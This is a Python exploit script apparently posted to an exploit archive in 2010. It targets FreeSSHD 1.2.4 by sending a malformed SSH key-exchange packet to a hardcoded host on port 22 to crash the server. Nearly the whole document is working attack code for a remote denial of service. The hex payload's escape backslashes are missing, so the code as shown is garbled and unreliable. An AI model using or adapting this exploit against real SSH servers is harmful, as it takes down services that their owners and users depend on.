FreeSSHD 1.2.4 Remote Buffer Overflow DoS
Posted on 22 March 2010
========================================= FreeSSHD 1.2.4 Remote Buffer Overflow DoS ========================================= #!/usr/bin/env python """ # Exploit Title: FreeSSHD 1.2.4 Remote Buffer Overflow DoS # Date: 22-03-2010 # Author: Pi3rrot - tagazok [At] gmail [D0t] com ak37@freenode # Software Link: http://www.freesshd.com/ # Version: 1.2.4 # Tested on: Windows XP SP3 fr # Explications : This pof just may crash FreeSSHD 1.2.4 on ssh2 connexion. It use a malformed string on the SSH Key Exchange Init Corruption Exploit tested on Windows SP3 fr maybe it can be more exploited ? Greets to the metasploit project & PV Eeckhoutte tutorials """ import sys import socket host = "192.168.0.14" port = 22 print "********************************************************" print " FreeSSHD 1.2.4 Buffer Overflow DoS" print " by Pi3rrot" print " tagazok@gmail.com<mailto:tagazok@gmail.com>" print "********************************************************" banner = "SSH-2.0-OpenSSH_5.1p1 Debian-5ubuntu1 " key = "x00x00x03x14x082xffxffx9fxdex5dx5fxb3x07x8fx49xa7x79x6ax03x3dxafx55x00x00x00x7ex64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x32x35x36x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x2dx65x78x63x68x61x6ex67x65x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x34x2dx73x68x61x31x2cx64x69x66x66x69x65x2dx68x65x6cx6cx6dx61x6ex2dx67x72x6fx75x70x31x2dx73x68x61x31x00x00x00x0fssh-rsa,ssh-dssx00x00x00x9dx61x65x73x31x32x38x2dx63x62x63x2cx33x64x65x73x2dx63x62x63x2cx62x6cx6fx77x66x69x73x68x2dx63x62x63x2cx63x61x73x74x31x32x38x2dx63x62x63x2cx61x72x63x66x6fx75x72x31x32x38x2cx61x72x63x66x6fx75x72x32x35x36x2cx61x72x63x66x6fx75x72x2cx61x65x73x31x39x32x2dx63x62x63x2cx61x65x73x32x35x36x2dx63x62x63x2cx72x69x6ax6ex64x61x65x6cx2dx63x62x63x40x6cx79x73x61x74x6fx72x2ex6cx69x75x2ex73x65x2cx61x65x73x31x32x38x2dx63x74x72x2cx61x65x73x31x39x32x2dx63x74x72x2cx61x65x73x32x35x36x2dx63x74x72x00x00x00x9dx61x65x73x31x32x38x2dx63x62x63x2cx33x64x65x73x2dx63x62x63x2cx62x6cx6fx77x66x69x73x68x2dx63x62x63x2cx63x61x73x74x31x32x38x2dx63x62x63x2cx61x72x63x66x6fx75x72x31x32x38x2cx61x72x63x66x6fx75x72x32x35x36x2cx61x72x63x66x6fx75x72x2cx61x65x73x31x39x32x2dx63x62x63x2cx61x65x73x32x35x36x2dx63x62x63x2cx72x69x6ax6ex64x61x65x6cx2dx63x62x63x40x6cx79x73x61x74x6fx72x2ex6cx69x75x2ex73x65x2cx61x65x73x31x32x38x2dx63x74x72x2cx61x65x73x31x39x32x2dx63x74x72x2cx61x65x73x32x35x36x2dx63x74x72x00x00x00x69x68x6dx61x63x2dx6dx64x35x2cx68x6dx61x63x2dx73x68x61x31x2cx75x6dx61x63x2dx36x34x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx73x68x61x31x2dx39x36x2cx68x6dx61x63x2dx6dx64x35x2dx39x36x00x00x00x69x68x6dx61x63x2dx6dx64x35x2cx68x6dx61x63x2dx73x68x61x31x2cx75x6dx61x63x2dx36x34x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x2cx68x6dx61x63x2dx72x69x70x65x6dx64x31x36x30x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx68x6dx61x63x2dx73x68x61x31x2dx39x36x2cx68x6dx61x63x2dx6dx64x35x2dx39x36x00x00x00x1ax7ax6cx69x62x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx7ax6cx69x62x2cx6ex6fx6ex65x00x00x00x1ax7ax6cx69x62x40x6fx70x65x6ex73x73x68x2ex63x6fx6dx2cx7ax6cx69x62x2cx6ex6fx6ex65x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00" buffer = banner + key sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((host, port)) print '[+] reponse du serveur : ' + sock.recv(1000) sock.send(buffer) print '[+] Buffer sent' sock.close() # Inj3ct0r.com [2010-03-22]
